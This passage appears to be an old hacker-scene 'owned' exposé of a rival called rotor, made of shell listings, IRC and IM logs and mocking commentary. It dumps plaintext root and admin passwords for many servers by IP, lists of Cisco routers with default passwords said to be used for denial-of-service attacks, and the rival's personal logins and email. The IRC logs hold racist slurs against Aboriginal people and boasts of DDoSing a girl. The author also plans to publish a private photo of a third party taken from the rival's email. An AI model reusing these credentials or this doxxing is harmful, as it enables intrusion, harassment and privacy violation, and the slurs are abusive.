200.41.0.138 200.41.3.17 200.41.6.49 200.41.7.17 200.41.10.177 200.41.10.209 200.41.24.9 200.41.25.122 200.41.25.190 200.41.25.186 200.41.25.198 200.41.25.234 200.41.25.246 200.41.25.54 200.41.38.66 200.41.38.78 200.41.38.122 200.41.38.170 200.41.38.150 200.41.38.206 200.41.38.246 200.41.38.254 200.41.39.113 200.41.39.169 200.41.40.22 200.41.40.50 200.41.40.82 200.41.40.102 200.41.40.130 200.41.40.154 200.41.40.182 200.41.40.189 200.41.40.206 200.41.40.254 200.41.42.225 200.41.44.193 200.41.47.79 200.41.47.81 200.41.47.209 200.41.60.193 200.41.61.145 200.41.61.225 200.41.61.241 200.41.62.137 200.41.62.161 200.41.62.207 200.41.62.217 200.41.63.97 200.41.63.114 200.41.63.141 200.41.63.170 200.41.63.214 200.41.63.250 200.41.66.129 200.41.67.41 200.41.67.57 200.41.68.14 200.41.68.50 200.41.68.102 200.41.68.142 200.41.68.34 200.41.68.174 200.41.68.182 200.41.68.242 200.41.68.234 200.41.68.246 200.41.68.222 200.41.79.134 200.41.79.133 200.41.85.1 200.41.85.161 200.41.91.85 200.41.91.83 200.41.127.65 200.41.226.129 200.41.226.145 200.41.226.161 200.41.226.225 200.41.228.18 200.41.229.217 200.41.230.17 200.41.229.242 200.41.231.49 200.41.233.39 200.41.234.66 200.41.234.246 lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls cisco cisco2 ddoslog legit list more-cisco owned usable lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat ddoslog 04:40 <@Kelly> [02:40] -> *rotor`* its comments and threats like that that define you as a fucking pup 04:40 <@Kelly> - 04:41 <@aid> haha 04:41 <@aid> yok 04:41 <@aid> a 04:41 <@aid> kelly 04:41 <@aid> omg 04:41 <@aid> ./wi torn 04:41 <@aid> and go to the url 04:41 <@aid> haha 04:41 <@aid> you're gonna piss yourself 04:41 <@aid> i chose the perf box to jupe him with 04:41 <@aid> haha 04:44 <@Kelly> hahahhaha 04:44 <@aid> now 04:44 <@aid> that 04:44 <@aid> is 04:44 <@aid> hilarious 04:44 <@aid> haha 04:44 <@aid> i just hit rotor` 04:44 <@aid> his new bnc 04:44 <@aid> lol 04:44 <@aid> toast 04:44 <@aid> --- 209.133.9.34 ping statistics --- 04:44 <@aid> 8 packets transmitted, 0 received, 100% packet loss, time 7013ms 04:45 <@Kelly> [02:40] well, you suck cock for cancelled shells... heh 04:45 <@Kelly> [02:41] and tehy are hitting lomag again, only this time i have logs of aid saying he was going to it from #obs, obs has snitches u know 04:45 <@Kelly> [02:42] get over youself 04:45 <@Kelly> [02:44] Yannow 04:45 <@Kelly> [02:44] you obviously have never whoised me dumbass 04:45 <@Kelly> [02:44] I work for most of the same providers 04:45 <@Kelly> [02:44] you have shells with 04:45 <@Kelly> [02:45] you fucked up when you had one hit that i work for 04:45 <@Kelly> [02:45] No such nick/channel 04:45 <@aid> lol 04:46 <@aid> haha 04:46 <@aid> rotor` is ~nicuxoji@69.22.129.220 * qeje 04:46 <@aid> rotor` on #syshackers 04:46 <@aid> he'[s 04:46 <@aid> in 04:46 <@aid> my bot is still in 04:46 <@aid> syshackers 04:46 <@aid> haha 04:46 <@Kelly> lol lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat legit Tony Montana - Vote for Pedro says: 69.17.188.187 adduser: INFO: Password for (h0rs3) is: QiivMOtLoiFZJC7 [jsz(jsz@pheer.my.0c192.com)] k [jsz(jsz@pheer.my.0c192.com)] www.cserverz.com/r0t0r god [jsz(jsz@pheer.my.0c192.com)] user: rotor [jsz(jsz@pheer.my.0c192.com)] pass: fuckf3ds [jsz(jsz@pheer.my.0c192.com)] ftp details: u: r0t0r p: fuck3dup [jsz(jsz@pheer.my.0c192.com)] username for ftp is r0t0r@cserverz.com lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat list 216.127.76.25 admin:1407791 67.15.70.17 admin:jeBam03 66.134.206.227 backup:oldrh lasick:lachuv 211.21.136.163 pgsql:pgsql toor:snortwest | rmd 64.246.0.35 admin::55ttiot_mily root:55ttiot_mily/tbm | root 216.127.92.54 admin:ferinolR | root lq(rotor@Sentinel.homeunix.net) mq(~/own)-> ls cisco cisco2 ddoslog legit list more-cisco owned usable lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat more-cisco 200.67.149.163 200.67.153.210 200.67.224.250 200.67.244.245 200.66.84.69 200.66.100.23 200.168.219.217 200.53.106.34 200.76.2.42 200.76.2.54 200.76.2.66 200.76.2.30 200.76.2.118 200.76.2.126 200.76.149.158 200.76.149.166 200.76.149.186 200.76.149.198 200.76.174.30 200.76.178.81 200.76.174.97 200.62.137.17 200.62.154.218 200.56.68.105 200.56.71.66 200.56.124.154 200.67.97.247 200.56.126.250 200.62.137.17 200.62.185.234 200.62.187.198 200.56.99.2 200.56.123.54 200.62.136.161 200.76.29.130 200.62.134.72 200.76.4.78 200.76.12.30 200.28.45.193 200.62.2.199 200.76.3.26 200.76.3.190 lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat owned 66.139.78.11 jimmy:bandb:12493:0:99999:7::: sandj:pinetree:12693:0:99999:7::: cochran:rickey:12690:0:99999:7::: mary:coomer:12718:0:99999:7::: grandjeep:truck:12818:0:99999:7::: [66.134.112.117] L:monitor PW: monitor 67.15.58.14 big0tree 67.15.104.18I8mB2ad 67.15.18.8 z01202882481 67.15.20.23 1shoot 67.15.2.40 Q"4zR^sP 67.15.80.98 Gk59R23c 67.15.20.23 1shoot 67.15.96.67 t3mp 67.15.64.21 v0daf0ne 67.15.56.7 THISRULES2 66.98.252.61 RlUdR6eJ5esp 67.15.74.25 d4rBo96mn 67.15.38.59 1heavan 67.15.68.91 a3317bfswdjf 67.15.68.92 hot14554 67.15.94.9 fodase 67.15.58.5 fr3nchd00r 204.44.192.18 HqDo14761181c22 67.15.62.49 bond007 64.246.42.13 benzg500 67.15.86.30 majid999 66.98.252.49 Jba0320Fl 66.98.252.24 1QmORdA5 67.15.12.90 kalimantan1 66.98.252.49 Jba0320Fl 67.15.80.16 jft690ie 66.98.164.92 mizpa77 66.98.150.75 10OcT03 66.98.166.87 1odjnmrt01 216.127.90.9 jengcoil BSD 64.246.28.61 crayonblackdown 64.246.58.97 mc10cc19mb68 66.98.254.23 hell001lleh 69.57.130.33 bbb456 216.127.92.22 login=rspoel xl$7Wh%Zev#T85.2 67.15.84.44 o35j38h2 67.15.2.12 7377boolala 67.15.82.32 gz957435 66.98.150.75 10OcT03 216.127.84.58 1drester23 207.44.226.26 Admin Password: daAt3am1985x Root Password: m0uldy!SPUDx 67.15.22.24 gek5150 66.98.250.25 12suma266 67.15.48.36 Kp7GR29vs1q 207.44.168.60 web2deb 67.15.86.2 Dd37B8vH84V6 207.44.168.60 web2deb 67.15.86.2 Dd37B8vH84V6 67.15.4.96 perk5085 67.15.66.40 askf445s 67.15.2.2 0r9ng#3 port 7005 ssh 67.15.2.45 login mol pass 6646645qzxpmn7193 su pass 33626066minasgyb4952 207.44.130.55 rEmit+75 67.15.2.17 man4man 66.98.202.6 conan55 67.15.94.21 types5goody 66.98.250.79 6swo040501 66.98.244.16 daped315 67.15.80.16 jft690ie 67.15.22.24 saucy1 67.15.22.24 saucy1 64.246.24.116 1990Richard 216.12.213.203 yourmomma 207.44.226.18 998shoupave 216.127.72.121 px88es7 207.44.168.60 web2red 216.40.243.24 galaxy21CO 64.246.52.8 Chela2003 66.98.190.91 bme3495 216.127.72.121 px88es7 66.98.246.59 barok92229 67.15.38.100 jb90jb2000 67.15.58.28 CMN07doctor 67.15.60.53 a3939889 67.15.86.30 majid999 67.15.34.3 swadminsw 67.15.12.43 fl4m3r d0theck! lq(rotor@Sentinel.homeunix.net) mq(~/own)-> cat usable 200.68.58.33 66.38.132.185 200.78.145.114 200.78.154.34 200.78.162.1 200.78.242.185 200.45.170.81 200.45.173.33 200.45.252.1 200.45.252.17 200.45.255.145 200.32.71.174 200.44.42.222 200.44.42.242 200.44.120.145 200.44.124.110 200.44.144.138 200.44.153.30 200.44.157.57 200.44.159.102 200.44.168.137 200.44.169.26 200.44.178.65 200.44.181.209 200.28.45.193 200.62.2.199 priv mode below 200.32.71.114 200.41.232.17 200.41.232.65 200.41.80.185 200.46.53.114 200.46.193.65 lq(rotor@Sentinel.homeunix.net) mq(~/own)-> exit ## Well that takes care of that shell.... ## Until next time [5] logs to show how leet r0t0r really is. 13:06 <@devii> You're not an abo, rotor. 13:06 <@rotor`> illusion said u said that 13:06 <@rotor`> Uh, 13:06 <@devii> You cant be. 13:06 <@rotor`> yes i am devii 13:06 <@devii> If ur dad is black 13:06 <@rotor`> 50 / 50 13:06 <@devii> and ur mum is white 13:06 <@rotor`> Yes i can be 13:06 <@devii> black ALWAYS dominates. 13:07 <@devii> its a proven fact 13:07 <@rotor`> devii : no it dosnt 13:07 <@devii> it does. 13:07 <@devii> there are rare exceptions. 13:07 <@rotor`> devii: your saying you have never seen a white aboriginal ? 13:07 <@rotor`> I SWEAR TO FUCKING GOD I AM 13:07 <@devii> Ahahaahahaah. 13:07 <@rotor`> HOW ELSE COULD I LIVE IN ABORIGINAL HOUSING 13:07 <@rotor`> IN A MISSION # How sad.. 13:07 <@devii> YAH FUCKEN WABO. 13:07 <@rotor`> U FUCK TARD 13:07 <@devii> rofl. 13:07 <@devii> Ohmy. 13:07 <@Torhne> lol 13:07 <@devii> see wigger, nigger 13:07 <@rotor`> dont tell me im not what i am 13:08 <@rotor`> i love my culture / family 13:08 <@devii> WELL THATS NICE ISNT IT. 13:08 <@rotor`> and am protective about it 13:08 <@devii> But you're not abo. 13:08 <@rotor`> w/e you reackon 13:08 <@devii> =P 13:08 <@rotor`> that pisses me off 13:08 <@rotor`> U JUST PISSED ME OFF 13:09 <@Torhne> lol 13:09 <@rotor`> trying to tell me im not what i am 13:09 <@rotor`> if u dont beleive me devii come down here 13:09 <@rotor`> to my home 13:09 <@rotor`> and aboriginals will answer the door 13:09 <@rotor`> and will live all around me 13:09 <@rotor`> U DONT KNOW JACK SHIT 13:09 <@rotor`> U LIVE IN A RICH TOWN 13:10 <@rotor`> WITH NO ABORIGINALS 13:10 <@rotor`> U ONLY KNOW WHAT U SEE ON FUCKING TV 13:10 <@rotor`> AFK # I bet he was crying here... 13:10 <@Torhne> HAS A DINGO EVER ATE YOUR BABY??? 13:10 <@Torhne> HA BITCH? 13:10 <@Torhne> WHAT NOW? 13:10 <@Torhne> ROTOR IS STrAIGHT OUT OF THE MUTHA FUCKIN HOOD OF AUSSIE LAND # Who is this kid? 13:11 <@Torhne> HE HAS GOT THAT SHIT ON LOCKDOWN 13:11 <@Torhne> SO TIGHT 13:11 <@Torhne> FUCKIN WITH THE BOOMERANG HANGIN OUT THE BACKSIDE OF HIS LOIN CLOTH 13:11 <@Torhne> whrew 13:11 <@rotor`> devii : im serious u dont beleive me # He is done crying and goes back to bitching at girls. 13:11 <@Torhne> ok 13:11 <@rotor`> come and find out 13:11 <@Torhne> im done 13:11 <@devii> rofl 13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick 13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick 13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick 13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick 13:12 <@rotor`> you cannot comment on what you dont know 13:12 <@devii> Oh but i know ;/ 13:12 <@rotor`> HTF would you know how my parents genes worked 13:12 <@rotor`> HTF would you know how my parents genes worked 13:12 <@rotor`> HTF would you know how my parents genes worked 13:12 <@devii> That abo's cant afford computers. 13:12 <@devii> lol 13:12 <@rotor`> U WOULDNT 13:12 <@rotor`> devii : now your just being racist 13:12 <@devii> lol no im not 13:12 <@rotor`> idk how you rich fucks thinks 13:12 <@rotor`> But why am i on here 13:12 <@devii> AHAHAH 13:12 <@rotor`> on a 56k # Get a job then. 13:13 <@rotor`> and a pentium 1 13:13 <@rotor`> ? 13:13 <@devii> I WAS ON 56K FOR YEARS. 13:13 <@rotor`> DID U FUCKING THINK OF THAT 13:13 <@devii> Hahahahaaha 13:13 <@devii> aof'hsoidgfisdfg 13:13 <@devii> go drink some more goon then. 13:13 <@rotor`> shut ur rich racist fucking mouth up 13:13 <@devii> petrol sniffuh. 13:13 <@rotor`> So 13:13 <@devii> LOL 13:13 <@rotor`> who cares 13:13 <@devii> Haha 13:13 <@devii> Or steel another one of my thongs. 13:13 <@devii> GO ON DO IT. 13:13 <@rotor`> wow im not a rich stuck up daddys girl 13:13 <@devii> JUST ONE THOUGH. 13:14 <@rotor`> WOWO 13:14 <@devii> Aawh ;p 13:14 <@Torhne> HE WILL STEAL THAT SHIT WHEN YIOU ARE WEARING IT # Can this kid just shut the fuck up.. 13:14 <@devii> ROFL. 13:14 <@rotor`> MY DADDY DOSNT SUPPLY ME EVERYTHING # Probably because he is a drunk. 13:14 -!- mode/#Killerz [+b *!*@203.51.179.47] by rotor` 13:14 <@devii> COS THATS WHAT ABBO'S DO. 13:14 -!- devii was kicked from #killerz by ping [Banned] 13:14 <@rotor`> no one bags on my heritage 13:35 <@rotor`> blizzy she isnt online anymore 13:36 < blizzy> why? 13:36 <@rotor`> i ddos'd her off 13:36 < blizzy> ok.. # From DDoS attacking NSA to DDoS attacking girls on IRC.... He is truly a great hacker. --------------------------------------------------------------------------------------------------------- Unfourtanetly I didnt manage to get the logs of when rotor joined #b4b0 and threatend to "own us all" :/ --------------------------------------------------------------------------------------------------------- [6] r0t0rs roots (that still works), ciscos (that still works) and passwords. roots that still works: 216.127.76.25 admin:1407791 67.15.70.17 admin:jeBam03 66.134.206.227 backup:oldrh lasick:lachuv 211.21.136.163 pgsql:pgsql toor:snortwest 64.246.0.35 admin::55ttiot_mily root:55ttiot_mily/tbm 216.127.92.54 admin:ferinolR 66.139.78.11 jimmy:bandb:12493:0:99999:7::: sandj:pinetree:12693:0:99999:7::: cochran:rickey:12690:0:99999:7::: mary:coomer:12718:0:99999:7::: grandjeep:truck:12818:0:99999:7::: 207.44.226.18 998shoupave # For a complete list just scroll up =) These are the cisco boxes he uses to DoS people with: Password: cisco 200.68.58.33 66.38.132.185 200.78.145.114 200.78.154.34 200.78.162.1 200.78.242.185 200.45.170.81 200.45.173.33 200.45.252.1 200.45.252.17 200.45.255.145 200.32.71.174 200.44.42.222 200.44.42.242 200.44.120.145 200.44.124.110 200.44.144.138 200.44.153.30 200.44.157.57 200.44.159.102 200.44.168.137 200.44.169.26 200.44.178.65 200.44.181.209 200.28.45.193 200.62.2.199 priv mode below: 200.32.71.114 200.41.232.17 200.41.232.65 200.41.80.185 200.46.53.114 200.46.193.65 200.68.58.33 66.38.132.185 200.78.145.114 200.78.154.34 200.78.162.1 200.78.242.185 200.45.170.81 200.45.173.33 200.101.84.198 login 4490@brt enable: rotor 200.78.5.16 200.45.67.209 login cisco enable: cisco 200.67.149.163 200.67.153.210 200.67.224.250 200.67.244.245 200.66.84.69 200.66.100.23 200.168.219.217 200.53.106.34 200.76.2.42 200.76.2.54 200.76.2.66 200.76.2.30 200.76.2.118 200.76.2.126 200.76.149.158 200.76.149.166 200.76.149.186 200.76.149.198 200.76.174.30 200.76.178.81 200.76.174.97 200.62.137.17 200.62.154.218 200.56.68.105 200.56.71.66 200.56.124.154 200.67.97.247 200.56.126.250 200.62.137.17 200.62.185.234 200.62.187.198 200.56.99.2 200.56.123.54 200.62.136.161 200.76.29.130 200.62.134.72 200.76.4.78 200.76.12.30 200.28.45.193 200.62.2.199 200.76.3.26 200.76.3.190 He really does have a great selection of passwords: ssh -l rotor matts.homeunix.net password: fuck3dup ssh -l h0rs3 69.17.188.187 # Dynamic IP password: QiivMOtLoiFZJC7 ssh -l hts ircd2.lomag.net password: 0mgbatm0n ftp panther.unixbsd.info (killerz.org) user: killerz password: fuck3dupsh1t ftp cserverz.com user: r0t0r password: fuck3dup www.cserverz.com/r0t0r/ # The stuff he has here is really funny.. user: rotor password: fuckf3ds rotorized9@hotmail.com # Also his MSN password: fuckfeds He also uses: fedsown Rotor has finally figured out he was owned and he has changed passwords on matts.homeunix.net and cserverz.com. Rest are the same I guess. I dont have the new IP to "69.17.188.187", but there wasnt anything interesting on it anyways. You can find the unreal.conf to his IRC server on his email. [7] Ok after getting all of his passwords, shells, email and all I think its time to find that god damn picture! (20:38:06) r0t0r: for some reason (20:38:10) r0t0r: i like a pakistani girl (20:38:48) Blizzy: heheh (20:38:49) Blizzy: cool (20:38:57) r0t0r: want a pic!? (20:39:05) Blizzy: yeah sure (20:39:14) r0t0r: http://kold.multiply.com/photos/album/1 (20:39:38) Blizzy: she is pretty (20:40:16) r0t0r: damn right (20:40:29) r0t0r: she sent me pics of her top half Up (20:40:33) r0t0r: I tihnk she likez me # Did she... hmm.. I wanna get my hands on that pic! (20:45:39) r0t0r: Who's pic did u find!? (20:45:42) Blizzy: kc (20:45:43) Blizzy: fuck dude (20:45:45) Blizzy: she is HOT (20:45:50) r0t0r: erg (20:46:01) Blizzy: I want her to have my children (20:46:03) r0t0r: were did you find it? (20:46:11) Blizzy: your email.. I was hoping for a naked pic :( (20:46:15) Blizzy: But dude.. SHE IS HOT (20:46:16) Blizzy: SO HOT (20:46:24) Blizzy: fuck... (20:46:30) r0t0r: YOu didnt hand that pic out did you?> (20:46:34) Blizzy: Nope (20:46:43) Blizzy: I just drooled for.. 10 minutes then closed the window (20:48:33) r0t0r: Now she is pissed off i tihnk (20:49:55) Blizzy: tell her I wanna marry her :P (20:49:56) Blizzy: hehe (20:50:06) Blizzy: the pic never got public (21:05:49) r0t0r: LoL (21:05:53) r0t0r: she hates me now # Aint that sad... Ehm.... www.someurl.com/kc.jpg # need to find someone to host the pic. [8] Conclusion r0t0r check list: 1. Own killerz [CHECK] 2. Own matts.homeunix.net [CHECK] 3. Find more shells and own them [CHECK] 4. Expose rotor as a fake and a drunk [CHECK] 5. Expose r0t0rs lame roots [CHECK] 6. Find his cisco's which he uses to DoS people [CHECK] 7. Get his passwords and see if I can find a naked pic of that girl he is messing around with. [She wasnt naked, but it was still a nice pic] Well I guess thats it.. rotor is owned...